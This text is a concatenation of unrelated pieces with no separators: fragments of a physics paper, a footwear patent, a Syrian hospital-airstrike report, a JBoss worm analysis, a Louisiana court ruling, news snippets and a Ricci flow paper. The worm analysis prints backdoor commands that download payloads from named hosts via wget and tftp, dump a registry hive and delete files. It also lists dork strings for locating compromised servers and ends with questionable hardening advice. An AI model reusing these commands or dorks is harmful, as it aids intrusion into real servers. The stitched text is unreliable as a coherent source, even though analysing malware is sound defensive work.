+2d\bm P\times\bm E-\frac{2dc^2}{\epsilon'(\epsilon'+mc^2)} (\bm P\times\bm \pi)(\bm{\pi}\cdot\bm E) %\\ +\frac{2dc}{\epsilon'} \left(\bm P\times[\bm \pi\times \bm H]\right). \end{array} \label{eqt}$$ In Eqs. (\[eqw\]),(\[eqt\]), $\epsilon'$ is defined by Eq. (\[eq34\]), $\bm P$ is the polarization vector, and $\bm S$ is the spin vector (i.e., the average spin). For scalar particles $$\begin{array}{c} \frac{d\bm \pi}{dt}=e\bm E+\frac{ec}{\sqrt{m^2c^4+c^2\bm\pi^2}} \left(\bm\pi\times\bm H\right). \end{array} \label{eqwl}$$ Two first terms in right hand sides of Eqs. (\[eqw\]),(\[eqwl\]) are the same as in the classical expression for the Lorentz force. This is a manifestation of the correspondence principle. The part of Eq. (\[eqt\]) dependent on the magnetic moment coincides with the well-known Thomas-Bargmann-Michel-Telegdi (T-BMT) equation. It is natural because the T-BMT equation has been derived without the assumption that the external fields are weak. The relativistic formula for the Stern-Gerlach force can be obtained from the Lagrangian consistent with the T-BMT equation (see Ref. [@PK]). The semiclassical and classical formulae describing this force also coincide. High-order corrections to the quantum equations of motion of particles and their spins should bring a difference between quantum and classical approaches. DISCUSSION AND SUMMARY ====================== The new method of the FW transformation for relativistic particles of arbitrary spin in strong external fields described in the present work is based on the previous developments [@JMP]. However, the use of transformation operator (\[eq18N\]) is not restricted by any definite commutation relations \[see Eq. (\[comm\])\] between even and odd operators. The proposed method utilizes the expansion of the FW Hamiltonian into a power series in the Planck constant which defines the order of magnitude of quantum corrections. In the FW Hamiltonian, exact expressions for low-order terms in $\hbar$ can be obtained. If the de Broglie wavelength is much less than the characteristic size of the nonuniformity region of the external field \[see Eqs. (\[rel1\]),(\[rel2\])\], the transition to the semiclassical approximation becomes trivial. In this case, it consists in replacing operators by corresponding classical quantities. The simplest semiclassical transition is one of main preferences of the FW representation. If Eqs. (\[rel1\]),(\[rel2\]) are not valid, the proposed method can be used in the weak-field expansion. This expansion previously used in Ref. [@JMP] presents the FW Hamiltonian as a power series in the external field potentials and their derivatives. In this case, the operator equations characterizing dynamics of the particle momentum and spin can also be derived. Solutions of these equations define the quantum evolution of main operators. Semiclassical evolution of classical quantities corresponding to these operators can be obtained by averaging the operators in the solutions. An example of such an evolution is time dependence of average energy and momentum in a two-level system. When the FW Hamiltonian can be expanded into a power series in the Planck constant, we obtain the semiclassical limit of the relativistic quantum mechanics. Since the correspondence principle must be satisfied, classical and semiclassical Hamiltonians and equations of motion must agree. As an example, we consider the interaction of scalar and spin-1/2 particles with the strong electromagnetic field. We have carried out the FW transformation and have derived the quantum equations of particle motion. We have also deduced the quantum equations of spin motion for spin-1/2 particles. Averaging operators in the quantum equations consists in substitution of classical quantities for these operators and allows to obtain the semiclassical equations which are in full agreement with the corresponding classical equations. The proved agreement confirms the validity of both the correspondence principle and the aforesaid method. All calculations have been carried out for relativistic particles in strong external fields. Acknowledgements {#acknowledgements .unnumbered} ================ The author is grateful to O.V. Teryaev for interest in the work and helpful discussions and to T. Tanaka for bringing to his attention Ref. [@Tanaka]. This work was supported by the Belarusian Republican Foundation for Fundamental Research. L. L. Foldy, S. A. Wouthuysen, [*Phys. Rev.*]{} [**78**]{}, 29 (1950). J. P. Costella and B. H. J. McKellar, [*Am. J. Phys.*]{} [**63**]{}, 1119 (1995). A. J. Silenko, [*J. Math. Phys.*]{} [**44**]{}, 2952 (2003). A. G. Nikitin, J. Phys. A **31**, 3297 (1998). E. Eriksen, [*Phys. Rev.*]{} [**111**]{}, 1011 (1958). W. I. Fushchich and A. G. Nikitin, [*Symmetries of Equations of Quantum Mechanics*]{} (Allerton Press Inc., N.Y., 1994). S. Weinberg, [*The Quantum Theory of Fields, Vol. 1: Foundations*]{} (Cambridge Univ. Press, Cambridge, 1995). A. G. Nikitin, A. V. Galkin, Hadronic J. **26**, 351-366 (2003); J. Niederle, A. G. Nikitin, J. Phys. A [**39**]{}, 10931-10944 (2006). H. Feshbach and F. Villars, Rev. Mod. Phys. [**30**]{}, 24 (1958). H. C. Corben and J. Schwinger, Phys. Rev. [**58**]{}, 953 (1940). J. A. Young and S. A. Bludman, Phys. Rev. [**131**]{}, 2326 (1963). T. Goldman, Phys. Rev. D [**15**]{}, 1063 (1977). E. I. Blount, Phys. Rev. [**128**]{}, 2454 (1962). S. R. de Groot and L. G. Suttorp, [*Foundations of Electrodynamics*]{} (North-Holland, Amsterdam, 1972). Z. V. Chraplyvy, Phys. Rev. [**91**]{}, 388 (1953); *ibid.*, [**92**]{}, 1310 (1953). T. Tanaka, A. Suzuki, M. Kimura, Z. Phys. A [**353**]{}, 79 (1995). W. Pauli, in [*Handbuch der Physik*]{}, edited by D. Flugge (Springer, Berlin, 1958), Bd. 5/1, p. 160; V. B. Berestetskii and L. D. Landau, [*Zs. Eksp. Teor. Fiz.*]{} [**19**]{}, 673 (1949), [*in Russian*]{}; A. I. Akhiezer and V. B. Berestetskii, [*Quantum Electrodynamics*]{} (Interscience, New York, 1965). V. P. Neznamov, Voprosy Atomnoj Nauki i Tekhniki. Seriya Teoreticheskaya i Prikladnaya Fizika [**2**]{}, 21 (1988), [*in Russian*]{}; Fiz. Elem. Chastits At. Yadra [**37**]{}, 152 (2006) \[Phys. Part. Nucl. [**37**]{}, 86 (2006). A.J. Silenko, Teor. Matem. Fiz. [**105**]{}, 46 (1995) \[Theor. Math. Phys. [**105**]{}, 1224 (1995)\]. P. Gosselin, A. Berard and H. Mohrbach, Eur. Phys. J. B [**58**]{}, 137 (2007); P. Gosselin, A. Berard and H. Mohrbach, Phys. Lett. A [**368**]{}, 356 (2007); P. Gosselin, J. Hanssen and H. Mohrbach, arXiv:cond-mat/0611628. E. de Vries, J.E. Jonker, Nucl. Phys. B [**6**]{}, 213 (1968). E. Eriksen and M. Kolsrud, Nuovo Cim. Suppl. [**18**]{}, 1 (1960). A. J. Silenko and O. V. Teryaev, Phys. Rev. D [**71**]{}, 064016 (2005). Y. N. Obukhov, Phys. Rev. Lett. [**86**]{}, 192 (2001); Fortsch. Phys. [**50**]{}, 711 (2002). S. Heidenreich, T. Chrobok and H. H. v.Borzeszkowski, Phys. Rev. D [**73**]{}, 044026 (2006). B. Mashhoon, Lect. Notes Phys. [**702**]{}, 112 (2006). A. J. Silenko and O. V. Teryaev, Phys. Rev. D [**76**]{}, 061101(R) (2007). A. Mostafazadeh, Czech. J. Phys. [**53**]{}, 1079 (2003). A. J. Silenko, Zs. Eksp. Teor. Fiz. [**123**]{}, 883 (2003) \[JETP, [**96**]{}, 775 (2003)\]. W. Pauli, Rev. Mod. Phys. [**13**]{}, 203 (1941). A. J. Silenko, Izv. Vyssh. Uchebn. Zaved., Fiz. [**48**]{}, No. 8, 9, (2005) \[Russ. Phys. J. [**48**]{}, 788 (2005)\]. A. J. Silenko, Yadernaya Fizika [**64**]{}, 1048 (2001) \[Phys. Atom. Nuclei [**64**]{}, 997 (2001)\]. A. A. Pomeransky and I. B. Khriplovich, Zh. Eksp. Teor. Fiz. [**113**]{}, 1537 (1998) \[J. Exp. Theor.Phys. [**86**]{}, 839 (1998)\].
This invention relates generally to footwear, and more particularly pertains to a pocket formed within or appended to the gusset or tongue of a shoe, and having utility for temporary storage of personal items during shoe usage, as when employed during sporting events, jogging, or the like. One problem that repeatedly confronts the athlete, and particularly the modern sportsman who actively participates in golf, tennis, jogging, or the like, or even when partaking in various sports, such as hunting and fishing, is the ability to securely locate personal items in the category of tees, some loose change, money, and the like. Various means were earlier employed for assuring the safety of one's personal items, but particularly were designed for usage when some significant amounts of money were involved. For example, in the early United States patent to Diemer, U.S. Pat. No. 654,388, upon a shoe, means for securing valuable items concealingly within the calf portion of the shoe, and more specifically upon its internal portion that rest against the leg, was given consideration. Thus, the shown embodiment provided means for securing ones valuables such as money, and in addition to furnishing concealment of the same in the event that one was personally accosted, as by a theft. Various other forms of similar type pocket structures were used in association particularly with boots, as are also shown in the earlier United States patents to Wirsching, U.S. Pat. No. 1,289,341, McAuslin, U.S. Pat. No. 1,100,758, in addition to the patent to Avis, U.S. Pat. No. 1,342,149. More contemporary inventors have given thought to various types of structure for forming pocket structures within shoes and boots, and such is shown in the United States patent to Corley, U.S. Pat. No. 2,908,082. In addition, the concept of adding decorativeness to the shoe through the addition of a purse or the like, as by attaching the same upon the frontal shoe upper, is shown in the United States patent to Bliese, U.S. Pat. No. 3,018,570, but the additional structure to form the purse as shown in this patent was integrally constructed into the vamp of the shoe itself, and therefore, made it difficult to insert and keys, money, or the like therein, and furthermore, when such objects of some hardness were located therein, would certainly constantly maintain pressure upon the foot of the wearer. The United States patent to Solomon, U.S. Pat. No. 2,712,700, shows another means for adding some decoration to a shoe through the addition of a purse, or the like. Furthermore, the adding of a holding means having some utility to the shoe, as by securing the same through its laces to the shoe, is shown in the golf tee holder as devised by Perry in his U.S. Pat. No. 2,662,677. Similar type devices are currently available upon the market. All of the foregoing embodiments have utility for holding some component of personal item, such as money, in a concealed fashion upon its wearer, while the current invention, to the contrary, intends to provide a pocket portion that can be built structurally and foldably onto the gusset or tongue of the footwear, so as to hold smaller personal items such as keys and money, while further incorporating, in its construction, various means for assuring the retention of the pocket portion onto and contiguously with the shoe upper portion, at the location of its lacings, so as to prevent the untimely loss of such items. It is, therefore, the principal object of this invention to provide a pocket portion that is structurally built foldably onto the gusset or tongue portion of footwear, whether it be tennis shoes, jogging shoes, golf shoes, hunting shoes, work shoes, or standard dress shoes, and which incorporates closure means for the pocket portion so as to assure that personal items contained therein will not be inadvertently lost by the wearer. Another object of this invention is to provide a pocket portion that is integrally structured foldably connected onto the tongue portion of the shoe gusset, and which can assure the safety of items enclosed therein, while at the same time enhancing the attractiveness of the footwear. Another object of this invention is to provide fastening and securing means that snugly hold the pocket portion contiguously against the upper portion of the shoe particularly at the location of its lacing. A further object of this invention is to provide a footwear pocket, conveniently built appending onto the structure of the shoe, and which incorporates an opening or slot into which personal items may be quickly inserted, for safety and storage, but which items do not exert any pressure or bind onto the wearer's foot during footwear usage. Another object of this invention is to provide a shoe pocket integrally formed into the structure of the shoe and which can be conveniently and promptly installed during a stage of shoe assembly. A further object of this invention is to provide resilient means within the structure of a shoe or footwear pocket that enhances the formation of the said pocket portion and for its locating contiguously against the upper part of the said shoe. Still another object of this invention is to provide a pocket portion for a shoe and which contains supplemental strap means that may hold golf tees, or the like, to facilitate their usage. These and other objects will become more apparent to those skilled in the art upon reviewing the summary of this invention, and upon undertaking a study of the description of its preferred embodiment in view of the drawings.
The airstrike on the al-Quds paediatric hospital in Aleppo has led to expressions of shock and anger in the West, but such attacks on medical facilities have become increasingly prevalent during Syria’s bloody civil war. Al-Quds, the main place for paediatric referral in what is left of medical facilities in Aleppo, the country’s richest city before the conflict, was situated on the bottom floors of a five-storey building in Sukkari district. The doors and windows were covered by sandbags in an attempt to keep out bullets and shrapnel, but these provided no protection against air strikes. Twenty-four hours later a clinic in the Marja district of the city – this one providing treatment for chronic illnesses – was also bombed. Medecines Sans Frontieres (MSF) which, along with the International Committee of the Red Cross (ICRC) had provided support for al-Quds reported that seven of the facilities it ran in Syria have been bombed in the last three months alone. Marianne Glasser, the head of the ICRC, pointed out after the al-Quds destruction that “this wasn’t the first time that lifesaving medical services have been hit”. She added: “We urge all parties: don’t attack hospitals.” It seems unlikely the air strikes will stop and fear of them has driven many clinics to be physically dug-in underground, but that is not a guarantee of safety. The Baghdad Hospital in Hreitan received a direct hit on Christmas Day last year, killing a medical worker, Ali Hamedo, and injuring ten other members of staff and 20 patients. “Not even underground is safe,” said a doctor at Hreitan. “We moved the hospital underground a year ago assuming it will be protected from the airstrikes. But the missiles penetrated through the levels. We had spent hundreds of thousands of dollars equipping the hospital, but now Hreitan has no more hospitals.” The targeting of medical staff by the Assad regime is not new. In the Summer of 2012, while covering the battle for Aleppo, we needed to seek treatment for Bari, a friend and activist who had been shot in the leg on the frontline in Salheddine, We found a makeshift clinic in an abandoned set of offices: a constant stream of dead and injured were being brought in, the atmosphere was tense with incoming shells not far away.
JBoss Worm Analysis in Details GUERRILA7 has report, the 20 October that a JBoss worm circulate to compromise servers running older version of theJBoss Application Server. The JBoss worm discovered by GUERRILA7 target Windows JBoss installation. CVE-2010-0738, published the 26 April 2010, concern a weakness in the default setup of JMX console (/jmx-console/) access security restrictions. A remote attacker could, without any login and password, execute commands in the JBoss running user context, through crafted GET or POST HTTP requests. Affected versions were : JBoss Application Server (AS) 4.0.x JBoss Communications Platform 1.2 JBoss Enterprise Application Platform (EAP) 4.2, 4.3, 5.0 JBoss Enterprise Portal Platform (EPP) 4.3 JBoss Enterprise Web Platform (EWP) 5.0 JBoss SOA-Platform (SOA-P) 4.2, 4.3, 5.0 By doing some Google dorking, in order to find the original source code of the worm, I found some infected JBoss servers. You can find here under a dorking list how will provide you some of these affected servers. “/zecmd/zecmd.jsp?comment=” “/idssvc/idssvc.jsp?comment=“ “/iesvc/iesvc.jsp?comment=“ Most of these dorks are present in JBoss status page and you can see some juicy commands executed through the “comment” parameter, like : GET /zecmd/zecmd.jsp?comment=perl+lindb.pl HTTP/1.0 GET /idssvc/idssvc.jsp?comment=wget+http://webstats.dyndns.info/javadd.tar.gz HTTP/1.0 GET /iesvc/iesvc.jsp?comment=wget+http://magicstick.dyndns-remote.com/kisses.tar.gz HTTP/1.0 GET /zecmd/zecmd.jsp?comment=cmd+dir HTTP/1.1 GET /zecmd/zecmd.jsp?comment=tftp+-i+93.182.154.67+GET+serv.exe+c:\srve.exe HTTP/1.1 GET /zecmd/zecmd.jsp?comment=cmd+%2Fc+reg+save+HKLM%5CSYSTEM+%5Cwindows%5Ctemp%5Ct1%5C1.bin HTTP/1.1 GET /zecmd/zecmd.jsp?comment=cmd+%2Fc+del+%5Cwindows%5Ctemp%5Ct1%5C*+%5Cinetpub%5Cwwwroot%5Cimages%5Clogo22.gif HTTP/1.1 GET /zecmd/zecmd.jsp?comment=netstat+-nl HTTP/1.1 After some time, I found an affected Linux server how reveal the details of one of the “*.tar.gz” file, in this analysis “javadd.tar.gz“. “javadd.tar.gz” contain these files : bm.c / bm.h / pnscan.c / version.c / Makefile / install-sh / ipsort : These file are part of Pnscan [pnsc] how is a multi-threaded port scanner with an extra capability to send and look for specific strings. These script need a compiler (gcc for Linux) to work. We will explain further how pnsc is used in the worm. This script will act as the major injection and propagation code. First of all, if the current JBoss running user is root, the script will call “treat.sh” script. I will describe further the usage of this script. The script will try to compile the “pnscan” script and will then execute the “fly.pl” script. Through the “sudoku” variable (LOL), the script will then execute “pnscan“. “pnscan” will try to find “JBoss” in the response string after submitting a HTTP HEAD request to random destination IPs in /16 range. All the results are saved into this file : $fl="/tmp/sess_0088025413980486928597bf$partx"; After the execution of “sudoku“, the script open the results and try to find possible vulnerable targets how have return “JBoss” in response. Here an attack is attempted by using the following payload (Source code), through another HTTP HEAD request to “/jmx-console/“. The decoded payload is a simple Java JSP backdoor form how allow command execution and result display (Source code). Depending on the infection script the Java JSP script will be pushed into as “idssvc.war“, “zecmd.war” or “iesvc.war” on the server. Once infected, the newly infected server will receive the order to execute “lindb.pl” through the Java JSP backdoor. This script will be executed by “lindb.pl” and will try to download some additional scripts, not actually available, from some domains also presents in “fly.pl” script. But these downloads are done by a compiled C script, installed in the root directory as “.sysdbs” file and planned to be executed by cron at 01:01 AM the day 10 of the month. we have been attacked with such script we have cleaned server , Now to preventing it further attacked what is best way ? we have taken few security measures now i will really appreciates if you can highlight such steps Try to change permissions of all files described above. # chmod 4444 (it’s force SUID an read only mode) then # chattr +i (make the file immutable) Remove all *.c *.o and *.h in ‘/’ directory and in you jboss installation directory. It’s works for me.
316 So.2d 474 (1975) Betty Overstreet SPELL v. EXECUTIVE OFFICERS, DIRECTORS AND/OR SHAREHOLDERS OF P & W INDUSTRIES, INC., et al. No. 10368. Court of Appeal of Louisiana, First Circuit. June 30, 1975. Rehearing Denied August 26, 1975. Writ Refused October 24, 1975. J. Lynn Ponder, Amite, for appellant. Tom H. Matheny, Hammond, for appellees. *475 Before SARTAIN, ELLIS and BARNETTE, JJ. ELLIS, Judge. This is a suit by Betty Overstreet Spell, individually and on behalf of her minor children, for damages arising out of the wrongful death of her husband, Douglas Allen Spell, Sr. Named as defendants are the Executive Officers, Directors and/or Shareholders of P & W Industries, Inc., and Hartford Accident and Indemnity Company, their liability insurer. None of the officers, directors, or shareholders are identified by name. Other defendants named were neither cited nor served with process and are not parties to this aspect of the case. No service of process was made on any of the officers, directors or shareholders of P & W Industries, Inc., although Hartford has filed all of its pleadings on their behalf as well as its own. The petition reveals that the decedent was an employee of P & W Industries, Inc., and that he was killed in the course and scope of his employment while operating a "cherry picker". It is alleged that decedent was loading a tank when a cable holding it snapped. When the tank fell, a pipe extending out from the end of it struck Mr. Spell and killed him. Articles VI and VII of the petition read as follows: VI "That the snapping of the cable on the `cherry picker' machine and the resulting death of your petitioner's husband was caused by the fault and negligence of the defendants, the executive officers, directors, and shareholders of P & W Industries, and Coast Metal Processors, Inc. and its executive officers, directors, and/or shareholders and Golden and Schwartz, Inc. and its executive officers, directors and/or shareholders, in failing to equip the `cherry picker' machine with the proper safety devices and in negligently employing defective and worn machinery and in negligently activating the said `cherry picker'." VII "In the alternative, your petitioner shows that the death of her husband was caused by acts of negligence, the specific nature which is unknown to your petitioner, but which is peculiarly within the knowledge of the defendants herein, their agents and employees, and that your petitioner is entitled to the benefit of the doctrine of res ipsa loquitur." To the petition, defendants filed a dilatory exception of vagueness and a peremptory exception of no cause and no right of action. After trial of the exceptions, the trial judge sustained the exception of no cause of action, and judgment was signed reading as follows: "It is ordered, adjudged, and decreed, that the Exception of No Cause and No Right of Action be and it is hereby sustained and plaintiff's suit is hereby dismissed as to Exceptor, Executive Officers, Directors, and/or Shareholders of P and W Industries, Inc., and the Hartford Accident and Indemnity Company." From that judgment, plaintiff has appealed. It is the defendants' position that the petition fails to allege a cause of action because it does not in a number of respects meet the requirements for liability of an executive officer as set forth in Canter v. Koehring Company, 283 So.2d 716 (La. 1973). They point out that plaintiff failed to name any specific defendant; failed to allege the existence of a duty of care owed the plaintiff; and failed to allege a breach of duty. *476 Under Article 891 of the Code of Civil Procedure, the plaintiff is required to identify all parties to the suit by name. However, the failure to do so is a defect of form, which should be raised by the dilatory exception. Article 926, Code of Civil Procedure. The existence of a duty is a question of law rather than fact. Under our fact pleading system, it is not necessary to allege conclusions of law. What plaintiff has alleged is that the defendants failed to furnish the decedent a safe place to work and employed defective and worn machinery. We think these allegations of fact, although minimal, are sufficient to support a cause of action, and that the trial judge should not have maintained the exception of no cause of action. In any event, the judge is required by Article 934 of the Code of Civil Procedure to order the pleadings amended to remove the grounds for the objection, if possible. The judgment in this case failed to afford plaintiff this opportunity. It is obvious that the petition is vague, in its failure to identify the parties defendant by name, and to allege with greater particularity the circumstances of the accident and the facts upon which the alleged liability of the defendants is based. It would be impossible for any defendant to plead to the petition until made aware of his identity and of the specific act of negligence relied on by plaintiff. We will therefore sustain the exception of vagueness filed by defendants, and order that the petition be properly amended in the above respects. Article 933, Code of Civil Procedure. The judgment appealed from is therefore reversed and set aside and there will be judgment in favor of plaintiff herein overruling the exceptions of no cause and right of action filed by the defendant. Further, there will be judgment in favor of defendants and against plaintiff, sustaining the exception of vagueness, and granting unto plaintiff a period of fifteen days from the date that this judgment becomes final to amend her petition in the respects herein above set forth, and, upon her failure to do so within the said delay, her suit will be dismissed with prejudice as to Hartford Accident and Indemnity Company and the Executive Officers, Directors, and/or Shareholders of P & W Industries, Inc. Costs of this appeal shall be borne equally by the plaintiff and the said defendants, with all other costs to await the final determination of this suit on its merits. Reversed and remanded.
The purpose of this study is to understand the biological basis for the difference between fetal and adult hematopoietic progenitors.
Published on Sep 19, 2019 A former Belfast City Councillor, Jolene Bunting, is the first elected official in Britain to have been removed from her seat for 'criticising Islam'.
State Legislature Passes Criminal Justice Reform Bills Tuesday, April 17th 2018, 7:06 pm By: Aaron Brilbeck The state legislature passed seven bills aimed at reducing the prison population and saving Oklahomans money. But it’s just the beginning. Combined, the bills are expected to reduce the state’s prison population by about 9,200 inmates. It’s a good start, but Oklahoma’s prisons are still bursting at the seams. Read Also: How Oklahoma Could Follow Texas’ Lead In Reducing Prison Population The State House of Representatives took up two bills and the Senate took up five. All passed with bipartisan support. The goal is to reduce sentences for non-violent and elderly inmates and focus more on mental health and drug abuse treatment, instead of incarceration. “The overall goal was to get people treatment to get people to be productive citizens of society and not locked up and costing the state a lot of money,” said Senator Greg Treat (R) Majority Floor Leader. Criminal justice reform backers say this is a good step, but “This is significantly watered down from the recommendations that came out of the governor’s task force,” said Andrew Speno with the organization Right on Crime. Speno said he wants to see more meaningful change. “Increase parole numbers for non-violent offenders, have more reasonable diversionary programs like drug courts, veterans courts, mental health courts for people with addiction issues. They get better outcomes at a much lower cost.” “It doesn’t drastically reduce the population today, we’re still about 113-percent capacity, it changes the trajectory in the future,” said Treat. The bills that passed Tuesday did not include funding for mental health and substance abuse treatments. Senate leaders say funding will be tackled in bills to be presented in the coming weeks.
--- author: - Max Hallgren title: 'The Nonexistence of Noncompact Type-I Ancient 3-d $\kappa$-Solutions of Ricci Flow with Positive Curvature' --- **Abstract**. In this short paper, we show there do not exist three-dimensional noncompact $\kappa$-solutions of Ricci flow that have positive curvature and satisfy a Type-I bound. This represents progress towards the proof of Perelman’s conjecture that the only complete noncompact three-dimensional $\kappa$-solution with positive curvature is the Bryant soliton. Introduction ============ This paper addresses a class of noncompact solutions to Ricci flow essential to the classification of singularities in three-dimensions. Namely, we classify three-dimensional complete noncompact $\kappa$-solutions $(M^3, g(t))$, $t \in (-\infty, 0)$, that satisfy the Type-I condition $$|Rm(g(t))|_{g(t)} \leq \dfrac{C}{|t|} \hspace{6 mm} \mbox{ for all } t \in (-\infty, 0) .$$ Here, a $\kappa$ solution means a complete ancient solution of Ricci flow that is $\kappa$-noncollapsed on all scales and has bounded nonnegative curvature. Let $(M^3, g(t)), \: t \in (-\infty, 0]$ be a complete noncompact 3-dimensional ancient Type-I $\kappa$-solution. Then $(M^3, g(t))$ is a quotient of the shrinking round cylinder. This result was communicated to Lei Ni by Perelman, though Perelman did write down the proof. The proposition was recently proved independently in [@yongjia], but the proof differs from ours in that it uses crucially a result about backwards stability of necks proven in [@klott2]. Roughly speaking, the idea of the proof is as follows. We use Perelman’s results on the global structure of 3d $\kappa$-solutions to show that, at every time, the $\kappa$-solution looks neck-like outside of a compact subset. We take backwards limits based in this set to establish a contradiction. If this subset does not move too quickly as $t \to -\infty$, then Perelman’s asymptotic shrinker theorem gives convergence to a cylinder. If the subset moves quickly, we show its curvature must still be comparable to the maximum curvature of the time slice. Then we are able to show the set cannot move too quickly, making use of the Type-I distortion estimates and the global structure of the solution.\ The following is an easy consequence of the proof of Proposition 1, and does not depend on the Type-I assumption. The scalar curvature at any soul of $(M, g(t))$ is comparable to that of the maximum curvature of the time slice. For a moment, consider a 3d noncompact $\kappa$-solution $(M^3, g(t))_{t \in (-\infty, 0]}$ with PCO. Ding [@ding] showed that no such solution can have a Type-I forwards singularity. Cao-Chow-Zhang [@caoben] proved independently that the solution cannot be both Type-I forwards and Type-I ancient. It is conjectured that the only complete noncompact $\kappa$-solution with positive curvature is the Bryant Soliton, but for now combining the above results gives the following. Suppose $(M^3, g(t))$, $t \in (-\infty, 0]$ is a noncompact 3d $\kappa$-solution with positive curvature. Then $(M, g(t))$ is Type-II ancient, and has either a forward Type-II singularity, or is eternal. In particular, after rescaling, $(M, g(t))$ has forward and backward limits equal to the Bryant soliton. Note that, by Hamilton’s Type-II rescaling, any noncompact 3d $\kappa$-solution with PCO must have both forward and backwards limits equal to the Bryant soliton, though the point-picking method to achieve the forward limit depends on whether the solution is eternal or suffers a Type-II forward singularity. The author is thankful to Yongjia Zhang for providing a simplification of Case 3 of the main result. Preliminaries ============= Throughout, we write $d_t(x, y) := d_{g(t)}(x, y)$ for $x, y \in M$. Given an ancient solution $(M, g(t))$, $t \in (-\infty, 0]$ of Ricci flow, an evolving $\epsilon$-neck is a subset of the form $$N := \{ (x, t) \in M \times (-\infty, 0] \: ; \: d_0(x, x_0) < \epsilon^{-\frac{1}{2}} R(x_0, t_0)^{-\frac{1}{2}}, \: t \in (t_0 -\epsilon^{-1}R(x_0, t_0)^{-1}, t_0] \}$$ that is, after rescaling by $R(x_0, t_0)$, $\epsilon$-close in the $C^{|1/\epsilon|}$-topology to the shrinking cylinder ${\mathbb{S}}^2 \times (-\epsilon^{-1}, \epsilon^{-1}).$ The point $(x_0, t_0)$ is then called the center of $N$. We denote by $K(\epsilon)$ the set of points which are not the centers of evolving $\epsilon$-necks. It is essential to our arguments to use the following version of Perelman’s result proved by Kleiner and Lott [@klott]: (Global Structure of noncompact 3d $\kappa$-solutions [@klott]) For any $\epsilon >0$, there exists $D = D(\epsilon, \kappa) > 0$ such that if $(M^3, g(t))$, $t \in (-\infty, 0]$ is an noncompact $\kappa$-solution with PCO, then:\ i. $K(\epsilon)$ is a compact set with $$\mbox{diam}_{g(0)}K(\epsilon) < D R(x_0, 0),$$ ii. $D^{-1}R(x, 0) \leq R(x_0, 0) \leq D R(x, 0)$ for any $x \in K(\epsilon)$,\ where $x_0$ is any soul of $(M, g(0))$. Next, we note that the scalar curvature at a fixed point in space cannot decay too quickly as $t \to -\infty$ For any Type-I ancient $\kappa$-solution $(M^3, g(t))$, $t \in (-\infty, 0]$, and any fixed $p \in M$, there exists $c = c(p) >0$ such that $|t|R(p, t) >c$ for all $t \in (-\infty, -1]$. Suppose by way of contradiction that there is a sequence $t_k \to -\infty$ such that $|t_k|R(p, t_k) \to 0$. We know from [@cao] that the sequence $(M, g_k(t), (p, 0))$, where $g_k(t) = |t_k|^{-1}g(|t_k|t)$, converges in the $C^{\infty}$ Cheeger-Gromov sense to a nonflat shrinking soliton $(M_{\infty}^3, g_{\infty}(t), (p_{\infty}, 0))$, $t \in (-\infty, 0]$. Thus $$R_k(p, 0) = |t_k|R(p, t_k) \to R(p_{\infty}, 0) = 0,$$ a contradiction. Finally, we need distortion estimates to control how fast the cap region can move as $t \to -\infty$. For any Type-I ancient $\kappa$-solution $(M^3, g(t))$, $t \in (-\infty, 0]$ satisfying $|t|R(x, t) \leq C$ for all $(x, t) \in M \times (-\infty, 0]$, there exists $C' = C'(C)$ such that for any $x, y \in M$ and $t_1 < t_2 <0$ we have $$d_{g(t_1)}(x, y) \leq d_{g(t_2)}(x, y) + C'(\sqrt{|t_2|} - \sqrt{|t_1|}) .$$ Fix $x, y \in M$. Then the global curvature assumption gives $$\dfrac{\partial}{\partial t} d_{g(t)}(x, y) \geq -4(n-1)\sqrt{C|t|^{-1}} .$$ Integrating from $t_1$ to $t_2$, we get $$d_{g(t_2)}(x, y) - d_{g(t_1)}(x, y) \geq -8\sqrt{C}(\sqrt{|t_1|} - \sqrt{|t_2|}).$$ Moreover, the nonnegative curvature assumption ensures that distances are nonincreasing. Proof of the Proposition ======================== *Proof of Proposition 1* Suppose by way of contradiction that $(M^3, g(t)), t \in (-\infty, 0]$ is not a quotient of the round cylinder. Then $(M^3, g(t))$ has positive sectional curvature everywhere, so is diffeomorphic to ${\mathbb{R}}^3$. Fix $\epsilon > 0$ sufficiently small. Then by Theorem 1, for each $t \in (-\infty, 0]$ there is a compact subset $K(t) \subseteq M$ such that $M \setminus K(t)$ is the set of points which are the center of evolving $\epsilon$-necks. Theorem 1 also states that $\mbox{diam}_{g(t)}K(t) \leq DR(y, t)^{-\frac{1}{2}}$ for all $t \in (-\infty, 0)$, $y \in K(t)$. Fix $p \in M$. For large enough $|t|$, the spacetime point $(p, t)$ is the center of an evolving $\epsilon$-neck: otherwise there is a sequence $t_j \to -\infty$ where $(p, t_j)$ is not the center of an evolving $\epsilon$-neck. By the Type-I assumption, and applying the definition of reduced length to the path constant in space, we see that the spacetime sequence $(p, t_j)$ has uniformly bounded reduced length with respect to $(p, 0)$. Thus Perelman’s asymptotic shrinker theorem gives that $(M, |t_j|^{-1}g(|t_j|t), (p, -1)), t \in (-\infty, 0)$ converges in the $C^{\infty}$ Cheeger-Gromov sense to a noncompact, nonflat gradient Ricci soliton with bounded curvature. However, such a soliton is a shrinking cylinder by Perelman’s classification, leading to a contradiction.\ **Case 1:** There exists a sequence $(x_k, t_k)$ in $M \times (-\infty, 0]$ with $x_k \in K(t_k)$, $t_k \to -\infty$, and $$\liminf_{k \to \infty} \dfrac{d_{g(t_k)}(x_k, p)}{\sqrt{\tau_k}} < \infty .$$ In this case, we have the result of Naber [@naber] that $$l_{(p, 0)}(x_k, \tau_k) \leq A \left( 1 + \dfrac{d_{g(t_k)}(x_k, p)}{\sqrt{\tau_k}} \right)^2$$ for some $A< \infty$ universal. Thus we have a bound on $l_{(p, 0)}(x_k, \tau_k)$ independent of $k$, so we can apply Perelman’s asymptotic shrinker theorem [@poincare] to get subconvergence of $(M, |t_k|g(|t_k|t), (x_k, -1))_{t \in (-\infty, -1]}$ to a cylinder, a contradiction.\ **Case 2:** There exists a sequence $(x_k, t_k)$ in $M \times (-\infty, 0]$ such that $t_k \to -\infty$, $x_k \in K(t_k)$, and $$\lim_{k \to \infty} |t_k|R(x_k, t_k) = 0 .$$ In this case, using that $R(p, t_k) \geq c|t_k|$, we get $$\lim_{k \to \infty} \dfrac{R(x_k, t_k)}{R(p, t_k)} = 0 .$$ Also, note that any soul $y$ of $(M, g(t_k))$ must lie in $K(t_k)$ as long as $\epsilon$ was chosen smaller than some universal constant. In fact, we will show that $y$ must lie outside the middle two-thirds of any $\epsilon$-neck $N \subseteq (M, g(t))$. Suppose by way of contradiction that $y$ is in the middle two-thirds of $N$. Then there is an open subset $N'$ that is a $10\epsilon$-neck that is disjoint from $y$, whose center sphere separates $M$, and is such 